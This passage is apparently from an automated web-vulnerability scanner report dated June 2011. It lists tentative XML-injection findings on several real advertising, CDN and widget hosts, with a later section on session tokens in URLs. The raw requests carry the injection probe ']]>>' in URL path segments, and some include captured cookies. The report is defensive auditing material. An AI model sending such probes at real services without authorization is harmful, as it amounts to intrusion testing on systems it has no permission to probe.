User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:11:46 GMT
Server: AmazonS3
x-amz-id-2: PogvlMZMZhFFsduA2a1dq8rxni3/+7jVVAcqH04n3nrmWw03SAL3txAhMwtqc0kO
x-amz-request-id: B2052B9F61F2B497
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images/photos/000]]>>/827/871/96813877.jpg.17952_crop_340
...[SNIP]...

8.5. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images/photos/000/827]]>>/871/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:12:30 GMT
Server: AmazonS3
x-amz-id-2: D3cQWi4LIGCgojsQB/CJ2nlLFTtSiybTSSad2XyOliLFntVP1x36mbe+1kqqu9YT
x-amz-request-id: 6D2ECEAE89F23877
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images/photos/000/827]]>>/871/96813877.jpg.17952_crop_340
...[SNIP]...

8.6. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images/photos/000/827/871]]>>/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:13:14 GMT
Server: AmazonS3
x-amz-id-2: hgFasLI+6ZzsE8BKI5J0sY1Ujbt0uFjZLapj8yN0QLnTqEwZcSw6jq5h+XxcyB7j
x-amz-request-id: E06A254A3AF79DD0
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images/photos/000/827/871]]>>/96813877.jpg.17952_crop_340
...[SNIP]...

8.7. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg]]>>?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:13:47 GMT
Server: AmazonS3
x-amz-id-2: z8fi58Vj156HXCqXHBPILPzdKMFY6CXgPcPggqUdlPThM5SReWUXGBilbf872sL4
x-amz-request-id: DAFF2CADDAC5AA24
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg]]
...[SNIP]...

8.8. http://load.exelator.com/load/ [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://load.exelator.com
Path:	/load/

Issue detail

Request

GET /load]]>>/?p=104&g=050&ssv_duid=910903057632460979 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxdjTsLwkAQhP%252FL9oG73b3XWgUVUTSKL8RGLnc5FMtgJf53Y0q7mWHmmyhG3r2QwGk5g8mgUIBjKay0aYMnbAMVduxyijo75Bzir6e1wOuRbwdUvGym49QK%252BNKajmKqPEWqOKVY%252BRxd5Qp23AVr2af%252FeT27%252FCJ0AtN6fpjvat9cFqvzpr%252BX1xO3%252Fenorv34ILDeD18P0VazYuZ%252F1K4Z6UGAePDaIBtUyhIpb2Dy%252BQJ%252Fgj%252Bb; BFF=eJzNlb9SwzAMxt8lT2DLThy7S0Mz0DsSeiRwYeI6MjMC746TGFf%252Bo%252FboAKz66ZMUy%252F5yNBLM%252B5vhzBQjZ7Lfaq2h2LwaXjG1sUCYorvvx9u755en%252FbAfi83RVJSm1LXVlC6OQkGuwMAmD8Dkvt99MD7T0nUHJztRDMCDWKM8iQrN%252Faf4%252B9ysE%252F5knCswcLM27eRmrSLZiWIAHsQa5UlUqLkZtxoUAENALHEqk0fgoZuyJWycysyV4PYMFGSAtIDFiubQ5%252Bc%252B9FQmp04Y8GaTEwb6hAONQhqRzhbUDJYtUc1ElanKz4kx1KZox107TyrXMJc2LNcwisyJzeOQS7RhFPk%252Btq4dwke0UoYpBuBBrFGeZNrY1YX3P2iz0kybZeOhRnkSFeq6dltpVgL%252BcLHEcWa4Bs5rJTXmaA0pDMVJNyxOoULGBJni2LggU3U2LnIkV5UcaRanEF%252BC5e3U1CUA%252BhLU1L6BulYrpfd90nxm%252FwPhyyf%252BA7TdZ529joHA4LyN025NGvPPffg3bPdal73KTJMnk0LaM%252FNiDAnPJBzygh%252FStnfB4WgjIz3rH1vUXznR1YZD%252BsoXd2iPRA%253D%253D; TFF=eJydlTFyxCAMRe%252ByJ0AyIMCNj5HWhYvMpEu6nb17BGMTW8Yb4YKBYf4DfUk2cxpien4nwPQAYycEM8UY8THOCdPzM8HIwxviyeSli2F8nfSQ9YPQ4zr2HFVMR%252FBsrFCGVSVj4rOXj%252BVr%252FlnE2WBXAmQ42QZyPMZB03bV5%252BVZ76SJzQAIjiqmI3hP2q4mhkZMUA5vly786amhP0W0pdcJjiqmJcpNRJMx7eyS1NudHgnxskngP%252FKyId%252BREONAeIe0TBr9nce8nLpIyXktRxXTETwTdcRUWltb46O%252By%252FuO6%252FG%252BYl1Zdp4RzDeFy59J5Xhr64eVAwhk4y2y1YMq0kfj0KrJo8u7nKyflpP1u%252BbcLjcYog%252F6gkhU75IqqSPyi%252BI7MlFaEppfTOHe6NUZp4rpiNcvmzkDYg%253D%253D; EVX=eJyNkEsOgzAMRO%252FCCTzOx7FzGIsl6y4r7t4ApQio2uwsvTfyaEYr9pxMVVMdLS031Yeh2IBM7OJM0SnBs2Ook%252BGg0ihEnAieNspnumYPGj4Uccmm3CjvNJ7pmsU7O7eKLMzUSuJS8lZjl9EpR9VAvXJbKjc1%252FFNvS1224B9bbG%252FKvdFXFSgStVPOSoljlzy%252FADmAiA4%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 13 Jun 2011 11:09:07 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://pixel.quantserve.com
Path:	/seg/r

Issue detail

Request

GET /seg]]>>/r;a=p-874AVp33Bbtkg;rand=71595130796292298871;*http://www22.glam.com/cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=qcsegs&gvalue=!qcsegs HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EOsBrAEB_QaBtw4YmjhNoYHKOzi1w5bRg9TqKDCCAQAAAvwR6CC-Js4YHtF2sjAOEQcB0R4TANH6HhuC0aXhQDBQoQPRThALg7O1w6gdHmwlsunS4RLaTxmH4Q

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Mon, 13 Jun 2011 11:11:36 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1307962894867&count=horizontal&counturl=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&related=mavsmoneyball&text=NBA%20Finals%202011%3A%20Dallas%20Mavericks%20Win%20Their%20First%20Ever%20Championship&url=http%3A%2F%2Fsbn.to%2FlfQTx9&via=mavsmoneyball HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Mon, 13 Jun 2011 11:07:36 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/tweet_button.html</Key><RequestId>24F9AAE9D7108316</Reque
...[SNIP]...

8.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1307962894867&count=horizontal&counturl=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&related=mavsmoneyball&text=NBA%20Finals%202011%3A%20Dallas%20Mavericks%20Win%20Their%20First%20Ever%20Championship&url=http%3A%2F%2Fsbn.to%2FlfQTx9&via=mavsmoneyball HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Mon, 13 Jun 2011 11:07:38 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>549F6E06B419EBD8</Reque
...[SNIP]...

8.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

Request

GET /e]]>>/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http://d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d%3Cna_da%3E%26ssv_dx_2%3d%3Cna_mp%3E%26ssv_dx_3%3d%3Cna_id%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 13 Jun 2011 11:15:11 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

Request

GET /e/getdata.xgi]]>>?dt=br&pkey=vrie89u2mpteq&ru=http://d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d%3Cna_da%3E%26ssv_dx_2%3d%3Cna_mp%3E%26ssv_dx_3%3d%3Cna_id%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 13 Jun 2011 11:15:14 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/cim_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim]]>>/script/cim_v92_cim_11_10_2.en.js?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:07:05 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:07:05 GMT
Connection: Keep-Alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/cim_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim/script]]>>/cim_v92_cim_11_10_2.en.js?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:07:12 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:07:12 GMT
Connection: Keep-Alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/cim_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim/script/cim_v92_cim_11_10_2.en.js]]>>?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Mon, 13 Jun 2011 11:07:19 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:07:19 GMT
Connection: Keep-Alive

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/sandbox_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim]]>>/script/sandbox_v92_cim_11_10_2.en.js?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:08:13 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:08:13 GMT
Connection: Keep-Alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/sandbox_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim/script]]>>/sandbox_v92_cim_11_10_2.en.js?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:08:19 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:08:19 GMT
Connection: Keep-Alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://s.meebocdn.net
Path:	/cim/script/sandbox_v92_cim_11_10_2.en.js

Issue detail

Request

GET /cim/script/sandbox_v92_cim_11_10_2.en.js]]>>?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Mon, 13 Jun 2011 11:08:25 GMT
Server: lighttpd/1.4.19
Accept-Ranges: bytes
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 20 Jun 2011 11:08:25 GMT
Connection: Keep-Alive

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9. Session token in URL previous next
There are 4 instances of this issue:

http://l.sharethis.com/pview
http://www.apture.com/js/apture.js
http://www.facebook.com/extern/login_status.php
http://www.google.com/recaptcha/api/challenge

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=b1d8748b-b62f-4386-8fe9-64214c4421aa&hostname=thesouthern.com&location=%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sessionID=1307962879794.34627&fpc=9fc39ed-13088a9af36-7127350f-1&ts1307962967810.0&r_sessionID=&hash_flag=&shr=&count=1

Request

